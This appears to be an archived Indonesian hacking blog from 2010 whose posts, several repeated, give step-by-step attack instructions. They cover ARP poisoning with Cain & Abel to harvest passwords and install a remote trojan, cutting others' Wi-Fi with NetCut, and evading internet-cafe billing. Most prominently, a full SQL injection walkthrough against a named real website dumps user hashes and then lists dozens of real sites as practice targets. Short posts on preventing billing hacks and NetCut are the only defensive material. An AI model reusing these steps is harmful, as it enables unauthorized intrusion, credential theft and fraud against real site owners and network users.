Cain & Abel adalah sebuah program Recovery Password sekaligus Pengendus Jaringan dari Massimiliano Montoro yang bisa didownload pada
CAIN dan ABLE
Komment dulu untuk melihat link nya!!!!
Cain & Abel mudah digunakan untuk pemula karena lebih enak dilihat untuk mata pemula seperti saya. Lebih sedikit berwarna-warni kali he2.... program Cain & Abel itu terdiri dari dua buah program yang terpisah. Cain, sang kakak, adalah program dengan tampilan pengendus yang sebenarnya dan memang langsung dipasang saat anda selesai menghantam next, dimana Abel, si adik, adalah jenis trojan yang menjadi remote console pada mesin target, dan tidak langsung diinstal saat anda penghantam next pada penginstalan Cain.
Untuk menggunakan sang adik, ada dua cara yaitu :
Pasang pada komputer secara langsung :
1. Buka tempat cain di install, anda akan melihat abel.exe dan abel.dll. Blok keduanyakemudian klik kanan dan copy.
2. Paste keduanya di direktori WINNT
3. Jalankan abel, atau klik start-run-abel.
4. Biarkan keduanya ngobrol lewat Service Manager milik Cain ”terasa bukan keakraban mereka.... 8) 8) "
5. Untuk menguninstall, jalankan run, dan ketikkan abel –r.
Melalui remote
1. Pilih komputer yang di remote dengan menggunakan cain pada Network Tab,kemudian klik kanan icon komputer tersebut
2. Buktikan ke-adminan anda pada komputer yang di remote. Sama sepeti membuktikan diri anda ke calon mertua, apakah anda sesuai untuk si yayang :P
3. Pilih services, terus Install Abel
Untuk memanen password dengan tools ini pertama jalankan program Cain N abel, jangan lupa pilih ethernet card yang dipakai pada bagian configure, start sniffer, klik tab sniffer pada bagian host disana terlihat beberapa komputer lengkap dengan alamat IP N mac adress_Nya, bingung, program cain tahu darimana??? Kita bisa Ping atau bisa juga dengan klik kanan pilih scan mac addres klik ok. Kemudian klik pada tab APR bagian bawah, lalu klik gambar tanda tambah pada bagian atas pilih salah satu kalau saya agak serakah saya pilih semua alamat IP address yang akan di_tipu/diracuni klik ok dan start apr.
Setelah semuanya selesai poisoning akan dilancarkan dan kita tinggal menunggu memanen password N username yang ada dijaringan kita dah. untuk melihat hasil kerja program cain tinggal klik APR ato Passwords pada bagian bawah.
Catatan:
Pada saat melakukan saya tester di dua warnet yang berbeda, sebagian pengunjung warnet protes kepada operator karna koneksi internet Nya menjadi sangat lambat bahkan tidak terkoneksi sama sekali begitu juga komputer si admin bisa disconect....!! jadi kita harus selalu berhati-hati untuk mencoba kehebatan tools ini
Tampilkan postingan dengan label hacker. Tampilkan semua postingan
Tampilkan postingan dengan label hacker. Tampilkan semua postingan
Sabtu, 03 April 2010
Rabu, 24 Maret 2010
Anti netcut gak berhasil Gue kasi solusi dengan PORT MONSTER
Udah pake anti netcut, anti arp, dll masih ga mempan?
Pake aja software PORT MONSTER, ni software emang ampuh. Jadi ni software fungsinya buat nge block IP si netcutter
1. Download PORT MONSTER Port Monster disini! setelah itu klik download locations
2. Install PORT MONSTER nya
3. Buka PORT MONSTER, klik ” Start ” dan PORT MONSTER siap dijalankan!
Nah, sekarang kamu ga usah khawatir lagi koneksinya di CUT! :twisted:
Sekian post dari gue, meskipun singkat tapi mudah2an berguna ;)
CMIIW
Pake aja software PORT MONSTER, ni software emang ampuh. Jadi ni software fungsinya buat nge block IP si netcutter
1. Download PORT MONSTER Port Monster disini! setelah itu klik download locations
2. Install PORT MONSTER nya
3. Buka PORT MONSTER, klik ” Start ” dan PORT MONSTER siap dijalankan!
Nah, sekarang kamu ga usah khawatir lagi koneksinya di CUT! :twisted:
Sekian post dari gue, meskipun singkat tapi mudah2an berguna ;)
CMIIW
Mengantisipasi Netcut
Lagi asik – asik wifi-an, tiba- tiba ada yg nge CUT koneksi kita pake netcut! : beaghhhh hancur hancur haaatiku cem lagu olga. haaaaa
Ok baiklah jika kemarin sempat saya posting bagaimana mematikan koneksi jaringan internet komputer lain sekarang saya akan berbagi bagaimana cara mencegah hal tersebut. Yang akan saya bagikan di sini adalah cara yang termudah, dengan menggunakan software yang ukurannya juga nggak terlalu besar.
Caranya:
1. Download aplikasinya Anti netcut di sini.
2. Install ke komputer anda
3. Jalankan atau aktifkan.
4. selesai.
Mudah-mudahan berhasil. Karna apa? terkadang anti netcut ini kurang berhasil untuk itu gue juga memposting diblog ini cara menangani apabila anti netcut gak berhasil! Anti netcut gak berhasil Gue kasi solusi dengan PORT MONSTER
Ok baiklah jika kemarin sempat saya posting bagaimana mematikan koneksi jaringan internet komputer lain sekarang saya akan berbagi bagaimana cara mencegah hal tersebut. Yang akan saya bagikan di sini adalah cara yang termudah, dengan menggunakan software yang ukurannya juga nggak terlalu besar.
Caranya:
1. Download aplikasinya Anti netcut di sini.
2. Install ke komputer anda
3. Jalankan atau aktifkan.
4. selesai.
Mudah-mudahan berhasil. Karna apa? terkadang anti netcut ini kurang berhasil untuk itu gue juga memposting diblog ini cara menangani apabila anti netcut gak berhasil! Anti netcut gak berhasil Gue kasi solusi dengan PORT MONSTER
Cara Putuskan Koneksi Wifi Komputer Lain
Menguasai atau mengusil pada saat menggunakan wifi agar anda bisa menggunakan Wifi sendiri ibarat sebuah istana yang dihuni oleh banyak orang tetapi anda yang megang kendali atau disebut rajanya. Tentunya hal ini membuat anda menjadi tersenyum-tersenyum sendiri karena mereka hanya bisa saling memandang cem orang pacaran curi-curi pandang sedangkan anda masih asik conek dengan WIFI anda,, wuihhhhh tamak banget konek sendiri!!
Apa fungsi lain dari Net Cut Mari Ikuti Penjelasan berikut.
Biasanya kecepatan shared connection pada dasarnya ditentukan banyaknya user yang terkoneksi, topologi yang digunakan, settingan protokol dan masih banyak lagi.. Jika menggunakan settingan murni, kecepatan akses akan dibagi berdasarkan banyaknya user yang menggunakannya.. contohnya : Bila kecepatan koneksi = 600 Kbps , dan ada 6 user yang menggunakannya, maka kecepatan masing-masing menjadi 100 Kbps, kecuali diberi limit connection pada user lain.. Jadi semakin banyak user terkoneksi, semakin kecil pula aksesnya.
Ok, baiklah tanpa basa-basi disini penulis tidak meberikan langkah-langkah cara kerjanya karna software ini sangat mudah digunakan anda akan mengerti dengan sendirinya. berikut adalah software putusin koneksi wifi temen, musuh at orang laen:
- Netcut [paling ampuh] Download disini Klik From our server 1
Netcut bukan “Netcat” merupakan singkatan dari Network Cut. Network adalah jaringan, sementara cut adalah menggunting (“huh.. semua dah pada tau tuh ” :D ). Jadi kalo kita defenisikan, Netcut berarti menggunting jaringan atau lebih tepatnya lagi memutus hubungan/koneksi. Kamu juga bisa Memotong hubungan di LAN
Untuk menggunakannya instal terlebih dahulu Netcut- lalu Scan lalu cut deh, dampang kan tp gue beri sedikit aja gambaranya!!!
Gunakan software ini untuk seperlunya aja
ingat ketamakan akan membawa penyesatan, nah kalo da sesat Lu bakal ...
Apa fungsi lain dari Net Cut Mari Ikuti Penjelasan berikut.
Biasanya kecepatan shared connection pada dasarnya ditentukan banyaknya user yang terkoneksi, topologi yang digunakan, settingan protokol dan masih banyak lagi.. Jika menggunakan settingan murni, kecepatan akses akan dibagi berdasarkan banyaknya user yang menggunakannya.. contohnya : Bila kecepatan koneksi = 600 Kbps , dan ada 6 user yang menggunakannya, maka kecepatan masing-masing menjadi 100 Kbps, kecuali diberi limit connection pada user lain.. Jadi semakin banyak user terkoneksi, semakin kecil pula aksesnya.
Ok, baiklah tanpa basa-basi disini penulis tidak meberikan langkah-langkah cara kerjanya karna software ini sangat mudah digunakan anda akan mengerti dengan sendirinya. berikut adalah software putusin koneksi wifi temen, musuh at orang laen:
- Netcut [paling ampuh] Download disini Klik From our server 1
Netcut bukan “Netcat” merupakan singkatan dari Network Cut. Network adalah jaringan, sementara cut adalah menggunting (“huh.. semua dah pada tau tuh ” :D ). Jadi kalo kita defenisikan, Netcut berarti menggunting jaringan atau lebih tepatnya lagi memutus hubungan/koneksi. Kamu juga bisa Memotong hubungan di LAN
Untuk menggunakannya instal terlebih dahulu Netcut- lalu Scan lalu cut deh, dampang kan tp gue beri sedikit aja gambaranya!!!
Gunakan software ini untuk seperlunya aja
ingat ketamakan akan membawa penyesatan, nah kalo da sesat Lu bakal ...
Selasa, 23 Maret 2010
Teknik dan Trik Cara Deface
Apa itu deface?? Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena
terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Nah berikut Teknik dan Trik Deface
maaf yah kalo trik yg saya gunakan ada yang sam denga teknik orang lain.......
but ne salah satu cara ngedeface web.........
langkah2 nya adalah:
1. Langkah pertama, Cari halaman pada website yang menampilkan sebuah informasi dari database…
http://www.catun.info/profile_view.php?id=113
2. Tes Vuln-nya dengan menambahkan tanda petik (’) pada akhir address…
http://www.catun.info/profile_view.php?id=113′
Browser akan menampilkan pesan error, itu tandanya website tersebut memiliki vuln SQL Injection…
3. Selanjutnya kita akan cari tau seberapa banyak colom dari tabel yang di tampilkan pada halaman tersebut, dengan cara menambahkan order by 1 — pada akhir brwser…
http://www.catun.info/profile_view.php?id=113%20order%20by%201%20– Jalan normal
ganti dengan angka 20
http://www.catun.info/profile_view.php?id=113%20order%20by%2020%20– Error, ini tandanya jumlah kolom tidak sampai 20
ganti dengan angka 17
http://www.catun.info/profile_view.php?id=113%20order%20by%2017%20– Jalan normal
ganti dengan angka 18
http://www.catun.info/profile_view.php?id=113%20order%20by%2018%20– Error
Ini menginformasikan bahwa jumlah kolom yang ditampilkan adalah 17…
4. Selanjutnya kita gunakan perinta union select untuk menggabungkan informasi yang ditampilkan pada halaman website…. sebelumnya tambahkan - pada angka 113…
http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–
Akan tampil angka yang di posisikan sesuai dengan urutan kolom sebenarnya….
5. Cek versi dengan mengetik version() pada sembarang angka pada addres bar…
http://www.catun.info/profile_view.php?id=-113%20union%20select%201,
version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–
tampil 5.0.51a-log, versi ini mendukung informartion_schema yang berguna untuk menampilkan isi tabel pada database…
6. Selanjutnya mengeluarkan isi tabel pada database… ganti version() dengan group_concat(table_name) dan tambahkan from information_schema.tables where table_schema=database()– pada akhir alamat
http://www.catun.info/profile_view.php?id=-113%20union%20select%201,
group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,
17%20from%20information_schema.tables%20where%20table_schema=database()–
akan tampil nama table disitu, disini kita coba cari tabel yang kira-kira menyimpan informasi tentang user login… terdapat sebuah tabel dengan nama users, selnjutnya kita akan tampilkan field2 yang ada pada tabel tersebut… ganti group_concat(table_name) dengan group_concat(column_name) dan ganti from information_schema.tables where table_schema=database()– dengan from information_schema.columns where table_name=0×7573657273–
Sebelumnya ubah nama tabel ke dalam bentuk hexa, gunakan website berikut untuk melakukannya http://www.swingnote.com/tools/texttohex.php jangan lupa tambahkan karakter 0x
http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17%20from%20information_schema.columns%20where%20table_name=0×7573657273–
akan keluar nama2 kolom pada tabel user :D
7. Selanjutnya kita akan mengeluarkan isi dari tabel tersebut, pilih kolom2 yang menurut kita penting saja….
http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,group_concat(name,0×20,pass,0×20),3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17%20from%20users–
Disini saya tampilkan isi pada kolom name dan pass, yang berarti username dan password untuk login pada site tersebut.. untung2 kita bisa dapat login sebagai administrator….
hasilnya akan di keluar seperti ini….
admin c9fd3192ea0807efb3cf0bd6d564cc41 ,iuiu c9fd3192ea0807efb3cf0bd6d564cc41 ,orre fd41e12d031c2ed6cf888638e66be4de ,guest c9fd3192ea0807efb3cf0bd6d564cc41 ,test c9fd3192ea0807efb3cf0bd6d564cc41 ,ghost9 f8162c4552f8d85f76bd4633b00c5a98 ,calin c9fd3192ea0807efb3cf0bd6d564cc41 ,ggg c9fd3192ea0807efb3cf0bd6d564cc41 ,bandit 3335e92c15a9e0ba515c0219fb6b4f67 ,Jeff Boy 16bdcbc8fcf5533f54f64ff9c05bbf5e ,Karina 8c70e53caf96823e292f6264276c9223 ,k1d0 d3018d3ccd01d717e6eb7760bdde3ab2 ,braty e28e9b2242e579f40bc78d08628c7297 ,creaM 2e970e822e1a8834203d06abb60f59ec ,speed c9fd3192ea0807efb3cf0bd6d564cc41 ,scooter c9fd3192ea0807efb3cf0bd6d564cc41 ,beciy 62b2b4b303264f138ba96ea3de80d1cc ,Catazx 63b4ec64d4a085d6172552b90badc5ba ,DarKPrince 77ec4b0ae3815a1b2e12910db3291df6 ,icsulescu f63ed3300797216784db8387a2deaff0 ,Flower ac8adb4331dbfd804f2ba21720888830 ,ExTaSy 3f5f252123b8f5ee4211bc1f9088534c ,alin00 0cc175b9c0f1b6a831c399e269772661 ,crisz 0cc175b9c0f1b6a831c399e269772661 ,xall c9fd3192ea0807efb3cf0bd6d564cc41
Password di simpan dalam bentuk MD5, silahkan cari website yang menyediakan fasilitas untuk mendecryptnya,,, hehe sebenarnya bukan mendecrypt karena MD5 tidak dapat di kembalikan ke bentuk semulanya, website tersebut menyediakan database MD5 yang nantinya akan di cocokkan dengan hash yang kita miliki untuk kemudian ditampilkan plain textnya….
Setelah kita berhasil mendapatkan user name dan password yang benar, Cari tempat untuk melakukan login dan masuk sebagai administrator menggunakan username dan password yang kita miliki……
Sekian tutorial singkat saya mengenai SQL Injection, bila kurang jelas silahkan ditanyakan, InsyaAllah akan saya jawab bila saya mampu menjawabnya…. :D
dan untuk latihan, berikut saya lampirkan website2 yang memiliki vuln SQL Injection….
http://www.statebank1898.com/news.asp?id=1
http://www.ssm.com.my/en/berita/news.php?id=57
http://www.blitzone.com.my/cybercafe/show-news.php?id=5
http://www.bohol.ph/article.php?id=110
http://www.klife.com.my/gallery.php?id=9
http://www.nbbnet.gov.my/BioArticle/article.php?id=305
http://www.westmont.com.my/project-show.php?id=28
http://www.viewsonic.com.my/my/pr/show.php?id=8
http://www.catun.info/profile_view.php?id=113
http://lin-online.web.id/product.php?id=1
http://fotografix.ca/viewPhoto.php?id=455
http://www.mirthandbeauty.com/mirth/vie … php?id=592
http://pcklab.com/viewphoto.php?id=15
http://www.campandfish.com.au/members/p … .php?id=25
http://theatreview.org.nz/reviews/review.php?id=1988
http://www.pchardware.ro/Reviews/review.php?id=182
http://www.dvdfuture.com/review.php?id=815
http://www.alsofwah.or.id/index.php?pil … dits&id=81
http://www.kraak.net/en/releases.php?ID=31
http://press.letsgohonduras.com/releases.php?id=39
http://www.naturetrust.bc.ca/releases.php?id=5
http://www.popboomerang.com/releases.php?id=4
http://www.videoezy.co.id/detail.php?movie=563
http://www.proton-edar.com.my/index.php … view&id=42
http://tpc.moh.gov.my/modules/tinyevent … show&id=16
http://www.irelandpakistan.com/gallery.php?id=51
http://www.magetan.go.id/next.php?id=1
http://www.central-jkt.sch.id/detail_news.php?id=27
http://www.sevilla.sch.id/detail_news.php?id=29
http://www.smkti-baliglobal.sch.id/bali … s.php?id=3
http://benuamobil.com/detail.php?id=39
selamat mencoba dan banyak mencoba-coba ya..........
terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Nah berikut Teknik dan Trik Deface
maaf yah kalo trik yg saya gunakan ada yang sam denga teknik orang lain.......
but ne salah satu cara ngedeface web.........
langkah2 nya adalah:
1. Langkah pertama, Cari halaman pada website yang menampilkan sebuah informasi dari database…
http://www.catun.info/profile_view.php?id=113
2. Tes Vuln-nya dengan menambahkan tanda petik (’) pada akhir address…
http://www.catun.info/profile_view.php?id=113′
Browser akan menampilkan pesan error, itu tandanya website tersebut memiliki vuln SQL Injection…
3. Selanjutnya kita akan cari tau seberapa banyak colom dari tabel yang di tampilkan pada halaman tersebut, dengan cara menambahkan order by 1 — pada akhir brwser…
http://www.catun.info/profile_view.php?id=113%20order%20by%201%20– Jalan normal
ganti dengan angka 20
http://www.catun.info/profile_view.php?id=113%20order%20by%2020%20– Error, ini tandanya jumlah kolom tidak sampai 20
ganti dengan angka 17
http://www.catun.info/profile_view.php?id=113%20order%20by%2017%20– Jalan normal
ganti dengan angka 18
http://www.catun.info/profile_view.php?id=113%20order%20by%2018%20– Error
Ini menginformasikan bahwa jumlah kolom yang ditampilkan adalah 17…
4. Selanjutnya kita gunakan perinta union select untuk menggabungkan informasi yang ditampilkan pada halaman website…. sebelumnya tambahkan - pada angka 113…
http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–
Akan tampil angka yang di posisikan sesuai dengan urutan kolom sebenarnya….
5. Cek versi dengan mengetik version() pada sembarang angka pada addres bar…
http://www.catun.info/profile_view.php?id=-113%20union%20select%201,
version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–
tampil 5.0.51a-log, versi ini mendukung informartion_schema yang berguna untuk menampilkan isi tabel pada database…
6. Selanjutnya mengeluarkan isi tabel pada database… ganti version() dengan group_concat(table_name) dan tambahkan from information_schema.tables where table_schema=database()– pada akhir alamat
http://www.catun.info/profile_view.php?id=-113%20union%20select%201,
group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,
17%20from%20information_schema.tables%20where%20table_schema=database()–
akan tampil nama table disitu, disini kita coba cari tabel yang kira-kira menyimpan informasi tentang user login… terdapat sebuah tabel dengan nama users, selnjutnya kita akan tampilkan field2 yang ada pada tabel tersebut… ganti group_concat(table_name) dengan group_concat(column_name) dan ganti from information_schema.tables where table_schema=database()– dengan from information_schema.columns where table_name=0×7573657273–
Sebelumnya ubah nama tabel ke dalam bentuk hexa, gunakan website berikut untuk melakukannya http://www.swingnote.com/tools/texttohex.php jangan lupa tambahkan karakter 0x
http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17%20from%20information_schema.columns%20where%20table_name=0×7573657273–
akan keluar nama2 kolom pada tabel user :D
7. Selanjutnya kita akan mengeluarkan isi dari tabel tersebut, pilih kolom2 yang menurut kita penting saja….
http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,group_concat(name,0×20,pass,0×20),3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17%20from%20users–
Disini saya tampilkan isi pada kolom name dan pass, yang berarti username dan password untuk login pada site tersebut.. untung2 kita bisa dapat login sebagai administrator….
hasilnya akan di keluar seperti ini….
admin c9fd3192ea0807efb3cf0bd6d564cc41 ,iuiu c9fd3192ea0807efb3cf0bd6d564cc41 ,orre fd41e12d031c2ed6cf888638e66be4de ,guest c9fd3192ea0807efb3cf0bd6d564cc41 ,test c9fd3192ea0807efb3cf0bd6d564cc41 ,ghost9 f8162c4552f8d85f76bd4633b00c5a98 ,calin c9fd3192ea0807efb3cf0bd6d564cc41 ,ggg c9fd3192ea0807efb3cf0bd6d564cc41 ,bandit 3335e92c15a9e0ba515c0219fb6b4f67 ,Jeff Boy 16bdcbc8fcf5533f54f64ff9c05bbf5e ,Karina 8c70e53caf96823e292f6264276c9223 ,k1d0 d3018d3ccd01d717e6eb7760bdde3ab2 ,braty e28e9b2242e579f40bc78d08628c7297 ,creaM 2e970e822e1a8834203d06abb60f59ec ,speed c9fd3192ea0807efb3cf0bd6d564cc41 ,scooter c9fd3192ea0807efb3cf0bd6d564cc41 ,beciy 62b2b4b303264f138ba96ea3de80d1cc ,Catazx 63b4ec64d4a085d6172552b90badc5ba ,DarKPrince 77ec4b0ae3815a1b2e12910db3291df6 ,icsulescu f63ed3300797216784db8387a2deaff0 ,Flower ac8adb4331dbfd804f2ba21720888830 ,ExTaSy 3f5f252123b8f5ee4211bc1f9088534c ,alin00 0cc175b9c0f1b6a831c399e269772661 ,crisz 0cc175b9c0f1b6a831c399e269772661 ,xall c9fd3192ea0807efb3cf0bd6d564cc41
Password di simpan dalam bentuk MD5, silahkan cari website yang menyediakan fasilitas untuk mendecryptnya,,, hehe sebenarnya bukan mendecrypt karena MD5 tidak dapat di kembalikan ke bentuk semulanya, website tersebut menyediakan database MD5 yang nantinya akan di cocokkan dengan hash yang kita miliki untuk kemudian ditampilkan plain textnya….
Setelah kita berhasil mendapatkan user name dan password yang benar, Cari tempat untuk melakukan login dan masuk sebagai administrator menggunakan username dan password yang kita miliki……
Sekian tutorial singkat saya mengenai SQL Injection, bila kurang jelas silahkan ditanyakan, InsyaAllah akan saya jawab bila saya mampu menjawabnya…. :D
dan untuk latihan, berikut saya lampirkan website2 yang memiliki vuln SQL Injection….
http://www.statebank1898.com/news.asp?id=1
http://www.ssm.com.my/en/berita/news.php?id=57
http://www.blitzone.com.my/cybercafe/show-news.php?id=5
http://www.bohol.ph/article.php?id=110
http://www.klife.com.my/gallery.php?id=9
http://www.nbbnet.gov.my/BioArticle/article.php?id=305
http://www.westmont.com.my/project-show.php?id=28
http://www.viewsonic.com.my/my/pr/show.php?id=8
http://www.catun.info/profile_view.php?id=113
http://lin-online.web.id/product.php?id=1
http://fotografix.ca/viewPhoto.php?id=455
http://www.mirthandbeauty.com/mirth/vie … php?id=592
http://pcklab.com/viewphoto.php?id=15
http://www.campandfish.com.au/members/p … .php?id=25
http://theatreview.org.nz/reviews/review.php?id=1988
http://www.pchardware.ro/Reviews/review.php?id=182
http://www.dvdfuture.com/review.php?id=815
http://www.alsofwah.or.id/index.php?pil … dits&id=81
http://www.kraak.net/en/releases.php?ID=31
http://press.letsgohonduras.com/releases.php?id=39
http://www.naturetrust.bc.ca/releases.php?id=5
http://www.popboomerang.com/releases.php?id=4
http://www.videoezy.co.id/detail.php?movie=563
http://www.proton-edar.com.my/index.php … view&id=42
http://tpc.moh.gov.my/modules/tinyevent … show&id=16
http://www.irelandpakistan.com/gallery.php?id=51
http://www.magetan.go.id/next.php?id=1
http://www.central-jkt.sch.id/detail_news.php?id=27
http://www.sevilla.sch.id/detail_news.php?id=29
http://www.smkti-baliglobal.sch.id/bali … s.php?id=3
http://benuamobil.com/detail.php?id=39
selamat mencoba dan banyak mencoba-coba ya..........
Senin, 22 Maret 2010
Tips mencegah hacking pada billing warnet
Dulu gue kan pernah ngasih tau caranya nge-hack billing. Nah, sekarang gue kasih tau pencegahannya. Kan gak enak, bisa ngerusak tapi gak bisa benerin. Kalo gitu namanya orang yang bertangggung jawab.
Sebenernya aku gak tau cara pencegahannya. Cara cara berikut yang aku temuin ini aku kira kira aja. Maklum, aku bukan Ahli tantang security, bisanya cuma ngeblog yang gak jelas ma chatting. Hal ini bisa ditanyain ke golongan SATE, bukan makanan ini, SATE itu Security Advisor Team, disingkat jadi SATE. Yaudah, basa basinya udah dulu. Ne cara cara yang (mungkin) bisa mencegah :
- Selalu ganti billing anda dengan menggunakan billing yang terbaru.
- Matikan service service yang bisa digunakan nge-hack untuk client, jadi clien tidak bisa akses. Contohnya, kalo kita lagi ngenet di warnet kadang – kadang kan ada tuch warnet yang gak bisa di buka CMD-nya, tekana tombol Win+R gak bisa, dan sejenisnya.
- Kalo bisa proteksi sang client jangan boleh memasukkan flash disk, jadi kalo mau ngopi atau mindah file yang udah di download harus dari computer billing atau computer khusus.Jadi, gak bisa ngelakuin hack.
- Kalo naruh IP computer penting jangan berjauhan. Yang deket deket aja sama computer clien, karena bisa ditebak, kalo ada computer yang alamat IP-nya jauh, itu pasti kalo gak computer billing ya computer server. Contohnya, computer client, IP-nya 168.192.7.1 = 168.192.7.2 = 192.168.7.3 , dan seterusnya, nah computer billing/server itu pasti ada di Nomer nomer yang jauh, kayak 192.168.7.50 , 192.168.7.25, dan lain lain. Itu bisa “di jadikan brute IP” oleh sang client untuk melakukan hacking.
- Di dalam jaringan JANGAN memberi nama computer billing dengan nama yang lain daripada yang lain. Contohnya, computer client namanya Comp-1, Comp-2. dst, tapi nama computer billing ada Comp-Billing. Saya saranin jangan dech. Mending namanya yang sama – sama aja.Toh, gak ada pengaruhnya kan ?
- Tutup akses untuk melihat IP address di samping kanan bawah
- Tutup akses ke Control Panel
- Berikan layanan terbaik, jadi sang client gak merasa rugi ngenet. Nah, kalo ngerasa rugi, misalnya bandwith yang kecil, akses lama, lagu atau filmnya jadul jadul, pasti sang client akan merasa rugi, yang nantinya bakal ada niatan buat nge-hack.
Untuk saat ini, kayaknya cukup itu dulu. Ntar kalo gak jelas anda boleh tanya ke YM gue
Mau maen warnet gratis
Yang gak takut dosa boleh dicoba tapi yang takut dosa mending zikir aja di mesjid.. he.he..he.
Emang sih banyak cara untuk mengelabui billing explorer
atau ngenet gratis dengan kecepatan yang cukup sepat. Kali ini caranya
cukup mudah tinggal download aja softwarenya di
sini. Software ini sizenya dijamin gak bakalan
ngabisin disk space cuma 70 KB. Berikut cara penggunaannya :
Emang sih banyak cara untuk mengelabui billing explorer
atau ngenet gratis dengan kecepatan yang cukup sepat. Kali ini caranya
cukup mudah tinggal download aja softwarenya di
sini. Software ini sizenya dijamin gak bakalan
ngabisin disk space cuma 70 KB. Berikut cara penggunaannya :
Ingredients :
1. Secangkir Kopi Hangat buat nemenin ngenet gratis semaleman penuh
di warnet
2. CMD, kalo CMD di warnet di block coba pake PortableApps >>
CMD Portable cari aja di mbah google cmd portable
3. HackBill.zip
4. Ayo langsung ketarget
Caranya :
1. Buka CMD, kemudian ketik net view, kemudian pasti
keluar komputer-komputer yang terhubung dengan jaringan LAN di warnet
tersebut
2. Cari yang kira - kira komputer tersebut adalah komputer
server(biasanya pake nama WARNETBILLING, pokonya ada
tulisan admin , administrator , billing,
dll lah)
3. Kemudian ketik ping nama_kompuet_server(ex. ping
DENETBILLING)
4. Catat IP Address adminnya tu...
5. Jalankan program billhack.zip
6. Pilih single client atau all client, single client untuk
menggratiskan kompueter tertentu saja, all client untuk menggartiskan
semua komputer, saya saranin pake yang single client aja, biar dosanya
gak gede-gede amat...
7. Ketik IP Address admin tadi, pake port 1500, trus tekan hack
now
8. Taraaaaaaaaaaaa, di biling server nickname kita
sudah tidak ada.
9. Tanyain ke OP kalo mau bayar ato mau buktiin kalo emang
hacking-nya sukses, kalo gak mau bayar yaudah lewati aja
Cat : Pada billing di komputer kita billing tetap berjalan, tetapi di
server sudah tidak ada,(tidak ada bukan NOL(0)).
Hal ini juga bisa membantu kita jika kita ingin jujur, kta tinggal
bayar sesui yang tertera pada billing kita.
Jika anda yang membaca ini adalah OP warnet, segera lakukan
pencegahan!
Untuk menanggulanginya bisa anda baca di Tips mencegah hacking pada billing warnet
selain itu ada juga ne software untuk bisa dilambatin
sama bisa diberhentiin juga.
pakai
heat Engine v5.3
Size: 186.82MB
Vurln nya di sinkronisasi waktu server sama client,
karenaClient > Server
kalo klien waktunya berhenti / lambat di
server pun juga gitu
cara,
tapi jangan ketahuan servernya ya ??
SETELAH PAKAI CHEAT ENGINE DAN WAKTU
BERHENTI / LAMBAT
2.
SETELAH PUAS MAIN
3.
RESTARTTTT!! DENGAN TOMBOL PANIC.
cheat engine bisa didownload
lewat sini :
engine v5.3
setelah
itu cari cheat engine v5.3 .
dan selamat mencoba .
Jumat, 19 Maret 2010
Melihat aktifitas pengunjung warnet
VNC merupakan salah satu software untuk melihat dan mengendalikan desktop pada mesin lain secara remote, sehingga seakan-akan anda sedang berada di depan komputer tersebut. Anda bisa melihat sikorban apa yang dilakuin ibarat anda mengintip org lagi mandi..
Menyiapkan koneksi VNC Perlu sahabat ketahui koneksi dengan VNC memerlukan IP kalau koneksi ke LAN dinamakan IP static, kalau koneksi ke Internet dinamakan IP publik, bila anda menggunakan vnc sekedar untuk remote jaringan LAN silakan gunakan ip static biasanya 192.168.1.1 atau…..tetapi kalau anda menggunakan ip publik untuk koneksi antar gedung atau international gunakan ip publik, cara mengetahui ip publik masuk aja website www.myipaddress.com kalau udah kebuka pasti anda lihat ip publik anda, OHH ia VNC paling anti sama fire wall itu kenapa dia enggak bakal bisa kalau harus melewati router maka dari itu saya biasanya menyiapkan modem kusus dan kokenksi ke internet menggunakan telkomnet, modem hanya kita gunakan bila ingin mengadakan remote yang menggunakan ip publik
baiklah saya tidak akan memperpanjang lebar lagi mari kita peraktekan... Meluncur eitch tunggu dulu download softwarenya disini
http://www.brothersoft.com/vnc-(virtual-network-computing)-download-10766.html
Sebelum menggunakan VNC sebaiknya jaringan sudah terinstall dengan baik. Agar koneksi bisa dilakukan. Untuk test koneksi jaringan LAN silakan anda lakukan ping kekomputer tujuan. saya harap anda sudah tau cara ping.. karena anda bukan saatnya untuk disulangi lagi..
Ikuti langkah berikut:
Pilih directory install trus Next
pilih VNC SERVER atau Viewer kalau Viewer artinya Anda dapat melakukan remote kejaringan kalau server artinya ada siap melayani koneksi untuk di remote terserah pilih yang mana, kalau masing binggung pilh aja dua-duanya dan rasakan kasiatnya,, he..he..
ikuti petunjuk gambar
beri sandi untuk komputer anda bila orang lain akan meremote komputer tentu dia harus tau sandi yang anda
isi sandi
Sampai disini anda sudah berhasil melakukan install, lakukan hal yang sama kesetiap komputer yang ingin diremote.
Kalau langka-langka sudah dijalankan untuk meremote komputer silakan jalankan VNC viewer dan masukan ip address tujuan
Nah sekarang kendali ditangan anda anda tinggal mengintip. kekekek
Menyiapkan koneksi VNC Perlu sahabat ketahui koneksi dengan VNC memerlukan IP kalau koneksi ke LAN dinamakan IP static, kalau koneksi ke Internet dinamakan IP publik, bila anda menggunakan vnc sekedar untuk remote jaringan LAN silakan gunakan ip static biasanya 192.168.1.1 atau…..tetapi kalau anda menggunakan ip publik untuk koneksi antar gedung atau international gunakan ip publik, cara mengetahui ip publik masuk aja website www.myipaddress.com kalau udah kebuka pasti anda lihat ip publik anda, OHH ia VNC paling anti sama fire wall itu kenapa dia enggak bakal bisa kalau harus melewati router maka dari itu saya biasanya menyiapkan modem kusus dan kokenksi ke internet menggunakan telkomnet, modem hanya kita gunakan bila ingin mengadakan remote yang menggunakan ip publik
baiklah saya tidak akan memperpanjang lebar lagi mari kita peraktekan... Meluncur eitch tunggu dulu download softwarenya disini
